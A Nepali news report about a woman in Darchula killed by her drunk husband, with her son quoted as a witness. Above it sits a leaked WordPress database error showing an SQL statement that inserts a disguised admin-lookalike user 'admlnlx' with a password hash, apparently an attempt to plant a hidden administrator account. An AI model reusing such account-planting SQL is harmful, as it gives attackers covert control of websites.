WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhsuzlXaJb4bl8smvBZQQ6qdR0y6XZ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:19:11', '', 'admlnlx', 'admlnlx')
दार्चुला, पुस १२–
दार्चुलामा श्रीमान्को कुटाईबाट श्रीमतीको मृत्यु भएको छ ।
मृत्यु हुनेमा भगवती गाविस–७ का घुत्तीसिंह धामीकी २७ वर्षीय श्रीमती सोना धामी रहेको जिल्ला प्रहरी कार्यालय दार्चुलाले जनाएको छ ।
श्रीमान् श्रीमतीबीच झगडा भएको र सोहि क्रममा श्रीमान्को कुटाइबाट गाएराती धामीको मृत्यु भएको प्रहरीले जनाएको छ ।
“बुबाले रक्सी सेवन गरी राति अबेर घरमा आउनुभएको थियो, उहाँ आएपछि आमासँग झगडा भयो त्यसपछि आमालाई लगातार कुटपिट गरेपछि आमाको मृत्यु भयो,”– धामीका १२ वर्षीय छोरा धिरेन्द्रसिंह धामीले बताए ।
घटनाबारे आज बिहान मात्रै थाहा पाएपछि स्थानीयले प्रहरीलाई खबर गरेका थिए । मृतक धामीसहित उनका श्रीमान् र चार छोराछोरी मजदुरीको सिलसिलामा दत्तु गाविस–७ महाकाली किनारमा त्रिपाल मुनि बस्दै आएको प्रहरीले जनाएको छ । अभियुक्त धामी फरार रहेको प्रहरीले जनाएको छ । –रासस